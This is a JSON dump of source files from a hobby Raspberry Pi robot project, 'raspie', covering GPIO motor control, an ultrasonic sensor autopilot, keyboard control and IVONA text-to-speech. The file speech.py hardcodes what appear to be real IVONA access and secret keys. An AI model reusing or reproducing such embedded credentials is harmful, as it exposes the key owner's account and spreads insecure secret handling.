[ { "alpha_fraction": 0.6238095164299011, "alphanum_fraction": 0.6253968477249146, "avg_line_length": 32.157894134521484, "blob_id": "085226174b9349ab173a98b1ff55650b946a7eb1", "content_id": "9d50cfe4945f9d6660e7dc8516e6a9e4f9d5f000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 630, "license_type": "no_license", "max_line_length": 63, "num_lines": 19, "path": "/src/webapi/speech/views.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpRequest\nfrom django.views.generic import View\nfrom django.conf import settings\nfrom django.shortcuts import render\n\nimport pyvona\n\nclass Speech(View):\n template_name = 'speech/test.html'\n\n def get(self, request, *args, **kwargs):\n if request.GET.get('text'):\n print request.GET['text']\n v = pyvona.create_voice(settings.IVONA_ACCESS_KEY, \n settings.IVONA_SECRET_KEY)\n v.voice_name = 'Jacek'\n v.speak(request.GET['text'])\n return render(request, self.template_name)\n" }, { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 56, "blob_id": "c39e31d3b29235c986ff360032f84dba0db5c10a", "content_id": "45d368445105582152724e25b6648ee87f0f05e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 114, "license_type": "no_license", "max_line_length": 104, "num_lines": 2, "path": "/README.md", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "# raspie\nRaspie Robot is my learn project to build intelligent robot using Raspberry Pi 2 model B and Python 2.7.\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 9.714285850524902, "blob_id": "2163a1846c410c1a3341f00185319c9e8768d9ce", "content_id": "15bb0186720391f03f58028d3930f5a488832df5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 76, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/start.sh", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/bin/sh\ncd /\ncd home/pi/raspie\ngit pull\ncd src\nsudo python start.py\ncd /\n\n" }, { "alpha_fraction": 0.5134261846542358, "alphanum_fraction": 0.5241173505783081, "avg_line_length": 33.22978591918945, "blob_id": "1ba4eef1e39ccadbcf84b3f31389a2c87fdb3eda", "content_id": "2e6bbbae5719146d874f7a61ff525623508ef174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8046, "license_type": "no_license", "max_line_length": 95, "num_lines": 235, "path": "/src/pymove.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport RPi.GPIO as gpio\nfrom distance import Distance\nimport pygame\nfrom pygame.locals import *\nfrom speech import Speech\nfrom multiprocessing import Process, Queue\nimport time\nimport os\nimport sys\n\n\nMOTOR_LEFT_EN1 = 7\nMOTOR_LEFT_EN2 = 11\nMOTOR_RIGHT_EN1 = 12\nMOTOR_RIGHT_EN2 = 22\nMOTOR_LEFT_UP = 13\nMOTOR_RIGHT_UP = 16\nMOTOR_LEFT_DOWN = 15\nMOTOR_RIGHT_DOWN = 18\n\ngpio.setmode(gpio.BOARD)\ngpio.setwarnings(False)\ngpio.setup(MOTOR_LEFT_EN1, gpio.OUT)\ngpio.setup(MOTOR_LEFT_EN2, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_EN1, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_EN2, gpio.OUT)\ngpio.setup(MOTOR_LEFT_UP, gpio.OUT)\ngpio.setup(MOTOR_LEFT_DOWN, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_UP, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_DOWN, gpio.OUT)\n\ngpio.output(MOTOR_LEFT_EN1, True)\ngpio.output(MOTOR_LEFT_EN2, True)\ngpio.output(MOTOR_RIGHT_EN1, True)\ngpio.output(MOTOR_RIGHT_EN2, True)\n\n\nclass PyMove:\n \"\"\"\n For controlling motors by gpio raspberry and keyboard.\n \"\"\"\n def __init__(self):\n self.data = []\n pygame.init()\n self.screen = pygame.display.set_mode()\n pygame.key.set_repeat(100, 100)\n self.font = pygame.font.SysFont('monospace', 22)\n \n def stop_motors(self):\n self.display_text('stoping motors...')\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n gpio.output(MOTOR_RIGHT_DOWN, False) \n self.display_text('stoped!')\n\n def restart_raspie(self):\n speech = Speech()\n speech.play_sound('sounds/Very_Excited_R2D2.mp3')\n gpio.cleanup()\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\n def shutdown(self):\n self.display_text('Shutting down...')\n speech = Speech()\n speech.play_sound('sounds/Sad_R2D2.mp3')\n os.system(\"shutdown now -h\")\n\n def display_text(self, text):\n# label = self.font.render(text, 1, (255,255,0))\n# self.screen.blit(label, 100,100)\n print text\n return False\n\n def run_up_start(self):\n text = \"UP Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, True)\n gpio.output(MOTOR_RIGHT_UP, True)\n\n def run_up_stop(self):\n text = \"UP Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n\n def run_down_start(self):\n text = \"DOWN Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, True)\n gpio.output(MOTOR_RIGHT_DOWN, True)\n\n def run_down_stop(self):\n text = \"DOWN Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_DOWN, False)\n\n def run_left_start(self):\n text = \"LEFT Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, True)\n gpio.output(MOTOR_RIGHT_UP, True)\n\n def run_left_stop(self):\n text = \"LEFT Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n\n def run_right_start(self):\n text = \"RIGHT Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, True)\n gpio.output(MOTOR_RIGHT_DOWN, True)\n\n def run_right_stop(self):\n text = \"RIGHT Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_RIGHT_DOWN, False)\n \n def autopilot_process(self, q_state):\n while True:\n distance = Distance()\n cm = distance.detect()\n self.display_text('Distance:')\n self.display_text(cm)\n print int(cm)\n if int(cm) <= 30:\n self.display_text('Obstacle!')\n self.stop_motors()\n time.sleep(1)\n self.run_down_start()\n time.sleep(0.3)\n self.run_down_stop()\n time.sleep(0.3)\n self.run_right_start()\n time.sleep(0.3)\n self.run_right_stop()\n print 'end obstacle'\n else:\n self.display_text('run!')\n self.run_up_start()\n \n if not q_state.empty():\n exit = q_state.get()\n if exit == 'autopilot_stop':\n print 'autopilot stop...'\n break\n if exit == 'exit':\n print 'stoping autopilot...'\n break\n \n def key_control(self, q_state):\n q_state.put('open')\n while True:\n if not q_state.empty():\n close = q_state.get()\n if close == 'exit':\n print 'exiting key_control...'\n break\n else:\n pass\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_POWER:\n self.shutdown()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_1:\n self.display_text('Closing raspie...')\n q_state.put('exit')\n gpio.cleanup()\n time.sleep(2)\n sys.exit()\n if event.type == pygame.KEYUP and event.key == pygame.K_2:\n autopilot_process = Process(target=self.autopilot_process, args=(q_state,))\n autopilot_process.start()\n \n if event.type == pygame.KEYDOWN and event.key == pygame.K_3:\n print 'Cleaning up gpio'\n gpio.cleanup()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_4:\n text = \"Co słychać?\"\n speech = Speech()\n speech.create_voice(text)\n self.display_text(text)\n if event.type == pygame.KEYDOWN and event.key == pygame.K_5:\n text = \"Let's dance!\"\n speech = Speech()\n speech.create_voice(text)\n self.display_text(text)\n self.run_left_start()\n time.sleep(1)\n self.run_left_stop()\n self.run_right_start()\n time.sleep(1)\n self.run_right_stop()\n self.run_up_start()\n time.sleep(1)\n self.run_up_stop()\n self.run_down_start()\n time.sleep(1)\n self.run_down_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_UP:\n self.run_up_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_UP:\n self.run_up_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:\n self.run_down_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_DOWN:\n self.run_down_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:\n self.run_left_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_LEFT:\n self.run_left_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:\n self.run_right_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_RIGHT:\n self.run_right_stop()\n\n def create_speech(self, text):\n url_speak = \"http://127.0.0.1:8000/speech?text=\" + filter_spaces(text)\n response = urllib2.urlopen(url_speak)\n text = response\n\n def start(self):\n q_state = Queue()\n key_control = Process(target=self.key_control, args=(q_state,))\n key_control.start()\n \n\nif __name__ == '__main__':\n PyMove().start()\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5661057829856873, "avg_line_length": 20.28205108642578, "blob_id": "5264e1e044a3c37232e01eed3fe7f22e89ff350b", "content_id": "1f50ca9df9b773d0ef4b92afbb657f6dc14ce138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 53, "num_lines": 39, "path": "/src/distance.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#encoding: utf-8\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\nTRIG = 31\nECHO = 32\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO, GPIO.IN)\nGPIO.output(TRIG, False)\n\nclass Distance:\n \"\"\"\n For detecting distanse.\n \"\"\"\n \n def __init__(self):\n pass\n\n def clean_gpio(self):\n GPIO.cleanup()\n \n def detect(self):\n time.sleep(1)\n GPIO.output(TRIG,1)\n time.sleep(0.00001)\n GPIO.output(TRIG,0)\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n while GPIO.input(ECHO) == 1:\n pulse_stop = time.time()\n distance = (pulse_stop - pulse_start) * 17150\n distance = round(distance, 2)\n return distance\n\nif __name__ == \"__main__\":\n distance = Distance()\n distance.detect()\n\n\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5789473652839661, "avg_line_length": 21.16666603088379, "blob_id": "adb958adea8ec0cea1e6ac7d0ba544b82b1267e0", "content_id": "d0df1e3f4e2aeda4d30d0e804d0ced6ba54e64f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/src/start.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/pi/raspie/src/venv/bin/python\n# -*- coding: utf-8 -*-\nimport os\n\nif __name__ == \"__main__\":\n os.system('python raspie.py')\n" }, { "alpha_fraction": 0.6835222244262695, "alphanum_fraction": 0.69398432970047, "avg_line_length": 25.090909957885742, "blob_id": "4edff7ef4a9b854576104e3028e616b8cc0ce4cd", "content_id": "798d82a9228a8a031c26bc090aaa9e347ddfa973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1147, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/src/raspie.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport multiprocessing\nimport os\nimport time\nfrom pymove import PyMove\nfrom speech import Speech\n\ndef webapi():\n os.system('venv/bin/python webapi/manage.py runserver 0.0.0.0:8000')\n\ndef move_control():\n move_control = PyMove()\n move_control.start()\n return move_control\n\ndef voice_commands():\n print \"voice_commands\"\n\ndef cam_recording():\n print \"cam_recording\"\n\ndef welcome():\n print \"started...\"\n speech = Speech()\n speech.play_sound('sounds/Processing_R2D2.mp3')\n\nif __name__ == '__main__':\n jobs = []\n# webapi = multiprocessing.Process(target=webapi)\n move_control = multiprocessing.Process(target=move_control)\n voice_commands = multiprocessing.Process(target=voice_commands)\n cam_recording = multiprocessing.Process(target=cam_recording)\n welcome = multiprocessing.Process(target=welcome)\n# jobs.append(webapi)\n jobs.append(move_control)\n jobs.append(voice_commands)\n jobs.append(cam_recording)\n jobs.append(welcome)\n# webapi.start()\n move_control.start()\n voice_commands.start()\n cam_recording.start()\n welcome.start()" }, { "alpha_fraction": 0.5674362182617188, "alphanum_fraction": 0.5722965002059937, "avg_line_length": 21.86111068725586, "blob_id": "acc71074665159500a43a24e31022621d28e3803", "content_id": "ee1f4d5ee94d7cc4d9f1ba84afd8eae8bf99bd74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 823, "license_type": "no_license", "max_line_length": 67, "num_lines": 36, "path": "/src/speech.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport urllib2\nfrom pygame import mixer\nimport pyvona\n\nIVONA_ACCESS_KEY = 'GDNAIKZKKGPM3SPFPZGA'\nIVONA_SECRET_KEY = 'PXnXmq3aV1qYsV4jxG4WtoVhESq4gZaXGjrDTBke'\n\nclass Speech(object):\n \"\"\"Class to making connection to voice webapi.\"\"\"\n \n def hello(self, text):\n self.create_speech(text)\n\n def filter_spaces(self, text):\n return text.replace(\" \", \"%20\")\n\n def create_voice(self, text):\n \"\"\"\"\"\"\n v = pyvona.create_voice(IVONA_ACCESS_KEY, IVONA_SECRET_KEY)\n v.voice_name = 'Jacek'\n\n try:\n v.speak(text)\n except:\n print \"Speech: connection not found!\"\n\n def play_sound(self, file):\n mixer.init()\n mixer.music.load(file)\n mixer.music.play()\n\nif __name__ == \"__main__\":\n speech = Speech()\n speech.hello('Hello World!')\n" } ]
8
rohitlaheri/Dags
https://github.com/rohitlaheri/Dags
cc0741ae9544374dbd88ccdfa6b1a7f93899a48a
1dea5d683e3f65e20c1f31dee1cedf9a773f04e1
9c8c2491ee8f7e4c81c9dceb07bc7f8b36b8f47a
refs/heads/main
2023-05-27T03:21:35.331861
2021-06-07T20:33:26
2021-06-07T20:33:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6200480461120605, "alphanum_fraction": 0.6290516257286072, "avg_line_length": 38.20000076293945, "blob_id": "6bf7508b8b954c870fbbbe7f98ec637e7dca2e07", "content_id": "f4edca0da665cef62a0f8c0200f6890b9cc75448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3332, "license_type": "no_license", "max_line_length": 124, "num_lines": 85, "path": "/rg_DAG_Test.py", "repo_name": "rohitlaheri/Dags", "src_encoding": "UTF-8", "text": "# Provision a Resource Group\n\n# Import the needed credential and management objects from the libraries.\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.identity import AzureCliCredential\nimport os\n\n#DAG Libraries\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\n\n\n# Default settings applied to all tasks\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1)\n}\n\nwith DAG('azure_container_instances',\n start_date=datetime(2021, 6, 6),\n max_active_runs=1,\n schedule_interval='@daily',\n default_args=default_args,\n catchup=False\n ) as dag:\n\n\n def create_rg():\n # Acquire a credential object using CLI-based authentication.\n credential = AzureCliCredential()\n os.environ[\"AZURE_SUBSCRIPTION_ID\"] = \"a2706439-4e8a-4934-ab98-c59ef52ce5b2\"\n # Retrieve subscription ID from environment variable.\n subscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n\n # Obtain the management object for resources.\n resource_client = ResourceManagementClient(credential, subscription_id)\n\n # Provision the resource group.\n rg_result = resource_client.resource_groups.create_or_update(\n \"PythonAzureExample-rg\",\n {\n \"location\": \"centralus\"\n }\n )\n\n # Within the ResourceManagementClient is an object named resource_groups,\n # which is of class ResourceGroupsOperations, which contains methods like\n # create_or_update.\n #\n # The second parameter to create_or_update here is technically a ResourceGroup\n # object. You can create the object directly using ResourceGroup(location=LOCATION)\n # or you can express the object as inline JSON as shown here. For details,\n # see Inline JSON pattern for object arguments at\n # https://docs.microsoft.com/azure/developer/python/azure-sdk-overview#inline-json-pattern-for-object-arguments.\n\n print(f\"Provisioned resource group {rg_result.name} in the {rg_result.location} region\")\n\n # The return value is another ResourceGroup object with all the details of the\n # new group. In this case the call is synchronous: the resource group has been\n # provisioned by the time the call returns.\n\n # Update the resource group with tags\n rg_result = resource_client.resource_groups.create_or_update(\n \"PythonAzureExample-rg\",\n {\n \"location\": \"centralus\",\n \"tags\": { \"environment\":\"test\", \"department\":\"tech\" }\n }\n )\n\n print(f\"Updated resource group {rg_result.name} with tags\")\n\n # Optional lines to delete the resource group. begin_delete is asynchronous.\n # poller = resource_client.resource_groups.begin_delete(rg_result.name)\n # result = poller.result()\n\n make_rg = PythonOperator(\n task_id='rg',\n python_callable=create_rg\n )\n" } ]
1
signofthefour/PPL
https://github.com/signofthefour/PPL
4c7b98c1fe7a4c64755a8cf209b447f91c62e574
c9c2cfdee10534c8ff38e395d7b9ea0e2d905cd2
7b8acd74e49a57a33994ab72d38f49948cc8a737
refs/heads/master
2023-02-08T19:00:22.305888
2021-01-05T17:47:16
2021-01-05T17:47:16
298,820,516
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.590452253818512, "alphanum_fraction": 0.6187185645103455, "avg_line_length": 38.79999923706055, "blob_id": "44ded91deb6b2fa91e156dc39fc911e07855bea4", "content_id": "dec66d8a5d2036644130f70ef554a2fe09bfd634", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1592, "license_type": "no_license", "max_line_length": 137, "num_lines": 40, "path": "/SyntaxAnalysis/src/test/LexerSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestLexer\n\nclass LexerSuite(unittest.TestCase):\n \n def test_lower_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"abc\",\"abc,<EOF>\",101))\n\n def test_lower_upper_id(self):\n self.assertTrue(TestLexer.checkLexeme(\"Var\",\"Var,<EOF>\",102))\n\n def test_escape_sequence(self):\n \"\"\"test illegal escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\\\\t def\" \"\"\",\"\"\"abc\\\\t def,<EOF>\"\"\",103))\n\n def test_real_without_e(self):\n \"\"\"test real without e\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"12.02\", \"12.02,<EOF>\", 104))\n\n def test_id_and_real(self):\n self.assertTrue(TestLexer.checkLexeme(\"abc 12 asdfjh\", \"abc,12,asdfjh,<EOF>\", 105))\n\n def test_error_token(self):\n self.assertTrue(TestLexer.checkLexeme(\"absa?sad\", \"absa,ERROR_CHAR ?\", 106))\n\n def test_sing_quote_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"abc\\\\'def\" \"\"\", \"\"\"abc\\\\'def,<EOF>\"\"\",107))\n \n def test_illegal_esc(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"abc\\\\has\" \"\"\", \"ILLEGAL_ESCAPE \\\"abc\\h\", 108))\n\n def test_double_quote_in_str(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"He asked me: '\"What is this?'\".\" \"\"\", \"\"\"He asked me: '\"What is this?'\".,<EOF>\"\"\",109))\n \n def test_normal_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\" \"\"\", \"\"\"abc,<EOF>\"\"\", 110))\n\n def test_unclose_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc \"\"\", \"\"\"UNCLOSE_STRING abc \"\"\", 111))\n" }, { "alpha_fraction": 0.6572287678718567, "alphanum_fraction": 0.6587321758270264, "avg_line_length": 35.29090881347656, "blob_id": "8fa0b0093c438f326291c7fc3d08ca1b3e757e3f", "content_id": "6b00b20c067aaa470d776f1e43134a52ec707a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3991, "license_type": "no_license", "max_line_length": 203, "num_lines": 110, "path": "/Assignments/assignment2/src1.1/gen_test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import os\nimport argparse\nimport sys,os\nsys.path.append('./test/')\nimport subprocess\nimport unittest\nfrom antlr4 import *\nfrom tqdm import tqdm\n\n#Make sure that ANTLR_JAR is set to antlr-4.8-complete.jar\nANTLR_JAR = os.environ.get('ANTLR_JAR')\nTARGET = '../target/main/bkit/parser' if os.name == 'posix' else os.path.normpath('../target/')\nlocpath = ['./main/bkit/parser/','./main/bkit/astgen/','./main/bkit/utils/']\nfor p in locpath:\n if not p in sys.path:\n sys.path.append(p)\n\nsys.path.append('../target/main/bkit/parser')\n\nfrom BKITLexer import BKITLexer\nfrom BKITParser import BKITParser\nfrom lexererr import *\nfrom ASTGeneration import ASTGeneration\n\nSUITE_DIR = r'./test/ASTGenSuite.py'\nTESTCASE_FOLDER_DIR = r'./test/testcases/'\nSOL_FOLDER_DIR = r'./test/solutions/'\n\nHEADER = \"\"\"\nimport unittest\nfrom TestUtils import TestAST\nfrom AST import *\n\nclass ASTGenSuite(unittest.TestCase):\n \n\"\"\"\n\ndef gen_function(inp, expect, filename):\n name = \"\\tdef test_\" + filename[:3] + \"(self):\" + '\\n'\n input_line = \"\\t\\tinput = \\\"\\\"\\\"\" + inp + \"\\\"\\\"\\\"\" + '\\n'\n expect_line = \"\\t\\texpect = \" + expect + '\\n'\n assert_line = \"\\t\\tself.assertTrue(TestAST.checkASTGen(input,expect,\" +filename[:3] + \"))\" + '\\n\\n'\n return name + input_line + expect_line + assert_line\n\ndef load_input(filename):\n inp = \"\"\n with open(os.path.join(TESTCASE_FOLDER_DIR, filename), 'r') as f:\n inp = ''.join(list(f))\n\n return inp\n\ndef load_expc(filename):\n expc = \"\"\n with open(os.path.join(SOL_FOLDER_DIR, filename), 'r') as f:\n expc = ''.join(list(f))\n \n return expc\n\ndef ensures_dir(directory: str):\n if len(directory) > 0 and not os.path.exists(directory):\n raise Exception(\"There is an existing dir\")\n\ndef gen_sol(testcase_dir, solution_dir):\n test_files = os.listdir(testcase_dir)\n for filename in tqdm(test_files, desc=\"Build solution\"):\n print(filename)\n inputfile = FileStream(os.path.join(testcase_dir,filename))\n dest = open(os.path.join(solution_dir, filename),\"w\")\n lexer = BKITLexer(inputfile)\n tokens = CommonTokenStream(lexer)\n parser = BKITParser(tokens)\n tree = parser.program()\n asttree = ASTGeneration().visit(tree)\n dest.write(str(asttree))\n dest.close()\n\ndef main(args):\n ensures_dir(args.testcase_dir)\n ensures_dir(args.solution_dir)\n ensures_dir(args.suite_dir)\n\n if args.gen_sol:\n gen_sol(args.testcase_dir, args.solution_dir)\n \n test_files = os.listdir(args.testcase_dir)\n sol_files = os.listdir(args.solution_dir)\n if not (len(list(test_files)) == len(list(sol_files))):\n print(\"The number of sol file and test file are not the same, check it!\".upper())\n file_str = HEADER\n try:\n for filename in tqdm(test_files):\n inp = load_input(filename)\n expc = load_expc(filename)\n \n file_str += gen_function(inp, expc, filename)\n with open(args.suite_dir, 'w') as f:\n f.write(file_str)\n except:\n print(\"An exception occurred when running gen testcase\".upper())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Expect dir for gen process.')\n parser.add_argument('--testcase_dir', type=str, default=TESTCASE_FOLDER_DIR, help=\"the testcase directory where you store the testcase in *.txt format\")\n parser.add_argument('--solution_dir', type=str, default=SOL_FOLDER_DIR, help=\"the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\")\n parser.add_argument('--suite_dir', type=str, default=SUITE_DIR, help=\"the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\")\n parser.add_argument('--gen_sol', type=bool, default=False, help=\"active the gen solution, you need to place the AST_GEN_TEST.py in the same dir with AST.py\")\n\n args = parser.parse_args()\n main(args)" }, { "alpha_fraction": 0.635371208190918, "alphanum_fraction": 0.635371208190918, "avg_line_length": 24.22222137451172, "blob_id": "5eba9a620b05b5c101a02e0950ad37ea676976be", "content_id": "57f4c337fde4a47f8116e6d7eb344b922b1d7846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 458, "license_type": "no_license", "max_line_length": 45, "num_lines": 18, "path": "/Assignments/assignment1/src/main/bkit/parser/lexererr.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\nclass LexerError(Exception):\n pass\n\nclass ErrorToken(LexerError):\n def __init__(self,s):\n self.message = \"ERROR_CHAR \" + s\n\nclass UncloseString(LexerError):\n def __init__(self,s):\n self.message = \"UNCLOSE_STRING \"+ s\n\nclass IllegalEscape(LexerError):\n def __init__(self,s):\n self.message = \"ILLEGAL_ESCAPE \"+ s\n\nclass UnterminatedComment(LexerError):\n def __init__(self):\n self.message = \"UNTERMINATED_COMMENT\"\n\n\n\n" }, { "alpha_fraction": 0.7243150472640991, "alphanum_fraction": 0.7311643958091736, "avg_line_length": 26.85714340209961, "blob_id": "c4939c645bdc3336abe6e457c479410932b37d31", "content_id": "d956e07ec77a759ef881d8ca5892427c6bb36f7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 81, "num_lines": 21, "path": "/LexicalAnalysis/BKITListener.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete listener for a parse tree produced by BKITParser.\nclass BKITListener(ParseTreeListener):\n\n # Enter a parse tree produced by BKITParser#program.\n def enterProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n # Exit a parse tree produced by BKITParser#program.\n def exitProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.5353535413742065, "alphanum_fraction": 0.5959596037864685, "avg_line_length": 19.789474487304688, "blob_id": "7b7115fe8176aaa32ca2a83d6cc6a2c12b88ff09", "content_id": "2b52ae868c2c1cdb948cf1064b6502a2449a001b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/FP/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\ndef double1(lst):\n return [x * 2 for x in lst]\n\ndef double2(lst):\n return [lst[0] * 2] + double2(lst[1:]) if len(lst) > 0 else []\n\ndef multiply(x, y):\n return x * y\n\ndef double3(lst, func):\n return list(map(lambda x : func(x,2), lst))\n\n# def double1(lst):\n# return list(map(lambda x: x*2, lst))\n\n\nprint(double1([1,2,3]))\nprint(double2([1,2,3]))\nprint(double3([1,2,3], multiply))\n" }, { "alpha_fraction": 0.5000239014625549, "alphanum_fraction": 0.5510364770889282, "avg_line_length": 32.94809341430664, "blob_id": "52c6e1d12b01d2c0dc265aecd042af128efbbe5b", "content_id": "71b9f27110b7799b3de284664419e718bafefb11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41872, "license_type": "no_license", "max_line_length": 189, "num_lines": 1233, "path": "/SyntaxAnalysis/tut/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n buf.write(\"\\u00a8\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\3\\2\\3\\2\\6\\2)\\n\\2\\r\\2\\16\\2*\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\48\\n\\4\\f\\4\\16\\4;\\13\\4\\5\\4=\\n\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5F\\n\\5\\f\\5\\16\\5I\\13\\5\\3\\6\")\n 